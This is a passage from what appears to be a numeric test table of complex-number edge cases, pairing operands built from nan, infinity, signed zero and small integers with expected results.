-inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(zero, zero), complex(nan, nan)}, {complex(nan, zero), complex(zero, -zero), complex(nan, nan)}, {complex(nan, zero), complex(zero, 1), complex(nan, nan)}, {complex(nan, zero), complex(zero, -1), complex(nan, nan)}, {complex(nan, zero), complex(zero, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(zero, zero), complex(nan, nan)}, {complex(nan, zero), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, zero), complex(zero, 1), complex(nan, nan)}, {complex(nan, zero), complex(-zero, -1), complex(nan, nan)}, {complex(nan, zero), complex(zero, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(1, zero), complex(nan, nan)}, {complex(nan, zero), complex(1, -zero), complex(nan, nan)}, {complex(nan, zero), complex(1, 1), complex(nan, nan)}, {complex(nan, zero), complex(1, -1), complex(nan, nan)}, {complex(nan, zero), complex(1, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(-1, zero), complex(nan, nan)}, {complex(nan, zero), complex(-1, -zero), complex(nan, nan)}, {complex(nan, zero), complex(-1, 1), complex(nan, nan)}, {complex(nan, zero), complex(-1, -1), complex(nan, nan)}, {complex(nan, zero), complex(-1, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(2, zero), complex(nan, nan)}, {complex(nan, zero), complex(2, -zero), complex(nan, nan)}, {complex(nan, zero), complex(2, 1), complex(nan, nan)}, {complex(nan, zero), complex(2, -1), complex(nan, nan)}, {complex(nan, zero), complex(2, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, zero), complex(nan, nan)}, {complex(nan, zero), complex(nan, -zero), complex(nan, nan)}, {complex(nan, zero), complex(nan, 1), complex(nan, nan)}, {complex(nan, zero), complex(nan, -1), complex(nan, nan)}, {complex(nan, zero), complex(nan, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(inf, zero), complex(nan, nan)}, {complex(nan, zero), complex(inf, -zero), complex(nan, nan)}, {complex(nan, zero), complex(inf, 1), complex(nan, nan)}, {complex(nan, zero), complex(inf, -1), complex(nan, nan)}, {complex(nan, zero), complex(inf, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, zero), complex(-inf, zero), complex(nan, nan)}, {complex(nan, zero), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, zero), complex(-inf, 1), complex(nan, nan)}, {complex(nan, zero), complex(-inf, -1), complex(nan, nan)}, {complex(nan, zero), complex(-inf, 2), complex(nan, nan)}, {complex(nan, zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(zero, zero), complex(nan, nan)}, {complex(nan, -zero), complex(zero, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(zero, 1), complex(nan, nan)}, {complex(nan, -zero), complex(zero, -1), complex(nan, nan)}, {complex(nan, -zero), complex(zero, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(zero, zero), complex(nan, nan)}, {complex(nan, -zero), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(zero, 1), complex(nan, nan)}, {complex(nan, -zero), complex(-zero, -1), complex(nan, nan)}, {complex(nan, -zero), complex(zero, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(1, zero), complex(nan, nan)}, {complex(nan, -zero), complex(1, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(1, 1), complex(nan, nan)}, {complex(nan, -zero), complex(1, -1), complex(nan, nan)}, {complex(nan, -zero), complex(1, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(-1, zero), complex(nan, nan)}, {complex(nan, -zero), complex(-1, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(-1, 1), complex(nan, nan)}, {complex(nan, -zero), complex(-1, -1), complex(nan, nan)}, {complex(nan, -zero), complex(-1, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(2, zero), complex(nan, nan)}, {complex(nan, -zero), complex(2, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(2, 1), complex(nan, nan)}, {complex(nan, -zero), complex(2, -1), complex(nan, nan)}, {complex(nan, -zero), complex(2, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, zero), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(nan, 1), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -1), complex(nan, nan)}, {complex(nan, -zero), complex(nan, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(inf, zero), complex(nan, nan)}, {complex(nan, -zero), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(inf, 1), complex(nan, nan)}, {complex(nan, -zero), complex(inf, -1), complex(nan, nan)}, {complex(nan, -zero), complex(inf, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -zero), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -zero), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -zero), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -zero), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -zero), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -zero), complex(nan, nan), complex(nan, nan)}, {complex(nan, -zero), complex(nan, inf), complex(nan, nan)}, {complex(nan, -zero), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(zero, zero), complex(nan, inf)}, {complex(nan, 1), complex(zero, -zero), complex(nan, inf)}, {complex(nan, 1), complex(zero, 1), complex(nan, nan)}, {complex(nan, 1), complex(zero, -1), complex(nan, nan)}, {complex(nan, 1), complex(zero, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(zero, zero), complex(nan, inf)}, {complex(nan, 1), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, 1), complex(zero, 1), complex(nan, nan)}, {complex(nan, 1), complex(-zero, -1), complex(nan, nan)}, {complex(nan, 1), complex(zero, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(1, zero), complex(nan, nan)}, {complex(nan, 1), complex(1, -zero), complex(nan, nan)}, {complex(nan, 1), complex(1, 1), complex(nan, nan)}, {complex(nan, 1), complex(1, -1), complex(nan, nan)}, {complex(nan, 1), complex(1, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(-1, zero), complex(nan, nan)}, {complex(nan, 1), complex(-1, -zero), complex(nan, nan)}, {complex(nan, 1), complex(-1, 1), complex(nan, nan)}, {complex(nan, 1), complex(-1, -1), complex(nan, nan)}, {complex(nan, 1), complex(-1, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(2, zero), complex(nan, nan)}, {complex(nan, 1), complex(2, -zero), complex(nan, nan)}, {complex(nan, 1), complex(2, 1), complex(nan, nan)}, {complex(nan, 1), complex(2, -1), complex(nan, nan)}, {complex(nan, 1), complex(2, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, zero), complex(nan, nan)}, {complex(nan, 1), complex(nan, -zero), complex(nan, nan)}, {complex(nan, 1), complex(nan, 1), complex(nan, nan)}, {complex(nan, 1), complex(nan, -1), complex(nan, nan)}, {complex(nan, 1), complex(nan, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(inf, zero), complex(nan, nan)}, {complex(nan, 1), complex(inf, -zero), complex(nan, nan)}, {complex(nan, 1), complex(inf, 1), complex(nan, nan)}, {complex(nan, 1), complex(inf, -1), complex(nan, nan)}, {complex(nan, 1), complex(inf, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 1), complex(-inf, zero), complex(nan, nan)}, {complex(nan, 1), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, 1), complex(-inf, 1), complex(nan, nan)}, {complex(nan, 1), complex(-inf, -1), complex(nan, nan)}, {complex(nan, 1), complex(-inf, 2), complex(nan, nan)}, {complex(nan, 1), complex(nan, nan), complex(nan, nan)}, {complex(nan, 1), complex(nan, inf), complex(nan, nan)}, {complex(nan, 1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -1), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -1), complex(zero, 1), complex(nan, nan)}, {complex(nan, -1), complex(zero, -1), complex(nan, nan)}, {complex(nan, -1), complex(zero, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -1), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -1), complex(zero, 1), complex(nan, nan)}, {complex(nan, -1), complex(-zero, -1), complex(nan, nan)}, {complex(nan, -1), complex(zero, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(1, zero), complex(nan, nan)}, {complex(nan, -1), complex(1, -zero), complex(nan, nan)}, {complex(nan, -1), complex(1, 1), complex(nan, nan)}, {complex(nan, -1), complex(1, -1), complex(nan, nan)}, {complex(nan, -1), complex(1, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(-1, zero), complex(nan, nan)}, {complex(nan, -1), complex(-1, -zero), complex(nan, nan)}, {complex(nan, -1), complex(-1, 1), complex(nan, nan)}, {complex(nan, -1), complex(-1, -1), complex(nan, nan)}, {complex(nan, -1), complex(-1, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(2, zero), complex(nan, nan)}, {complex(nan, -1), complex(2, -zero), complex(nan, nan)}, {complex(nan, -1), complex(2, 1), complex(nan, nan)}, {complex(nan, -1), complex(2, -1), complex(nan, nan)}, {complex(nan, -1), complex(2, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, zero), complex(nan, nan)}, {complex(nan, -1), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -1), complex(nan, 1), complex(nan, nan)}, {complex(nan, -1), complex(nan, -1), complex(nan, nan)}, {complex(nan, -1), complex(nan, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(inf, zero), complex(nan, nan)}, {complex(nan, -1), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -1), complex(inf, 1), complex(nan, nan)}, {complex(nan, -1), complex(inf, -1), complex(nan, nan)}, {complex(nan, -1), complex(inf, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -1), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -1), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -1), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -1), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -1), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -1), complex(nan, nan), complex(nan, nan)}, {complex(nan, -1), complex(nan, inf), complex(nan, nan)}, {complex(nan, -1), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(zero, zero), complex(nan, inf)}, {complex(nan, 2), complex(zero, -zero), complex(nan, inf)}, {complex(nan, 2), complex(zero, 1), complex(nan, nan)}, {complex(nan, 2), complex(zero, -1), complex(nan, nan)}, {complex(nan, 2), complex(zero, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(zero, zero), complex(nan, inf)}, {complex(nan, 2), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, 2), complex(zero, 1), complex(nan, nan)}, {complex(nan, 2), complex(-zero, -1), complex(nan, nan)}, {complex(nan, 2), complex(zero, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(1, zero), complex(nan, nan)}, {complex(nan, 2), complex(1, -zero), complex(nan, nan)}, {complex(nan, 2), complex(1, 1), complex(nan, nan)}, {complex(nan, 2), complex(1, -1), complex(nan, nan)}, {complex(nan, 2), complex(1, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(-1, zero), complex(nan, nan)}, {complex(nan, 2), complex(-1, -zero), complex(nan, nan)}, {complex(nan, 2), complex(-1, 1), complex(nan, nan)}, {complex(nan, 2), complex(-1, -1), complex(nan, nan)}, {complex(nan, 2), complex(-1, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(2, zero), complex(nan, nan)}, {complex(nan, 2), complex(2, -zero), complex(nan, nan)}, {complex(nan, 2), complex(2, 1), complex(nan, nan)}, {complex(nan, 2), complex(2, -1), complex(nan, nan)}, {complex(nan, 2), complex(2, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, zero), complex(nan, nan)}, {complex(nan, 2), complex(nan, -zero), complex(nan, nan)}, {complex(nan, 2), complex(nan, 1), complex(nan, nan)}, {complex(nan, 2), complex(nan, -1), complex(nan, nan)}, {complex(nan, 2), complex(nan, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(inf, zero), complex(nan, nan)}, {complex(nan, 2), complex(inf, -zero), complex(nan, nan)}, {complex(nan, 2), complex(inf, 1), complex(nan, nan)}, {complex(nan, 2), complex(inf, -1), complex(nan, nan)}, {complex(nan, 2), complex(inf, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, 2), complex(-inf, zero), complex(nan, nan)}, {complex(nan, 2), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, 2), complex(-inf, 1), complex(nan, nan)}, {complex(nan, 2), complex(-inf, -1), complex(nan, nan)}, {complex(nan, 2), complex(-inf, 2), complex(nan, nan)}, {complex(nan, 2), complex(nan, nan), complex(nan, nan)}, {complex(nan, 2), complex(nan, inf), complex(nan, nan)}, {complex(nan, 2), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, 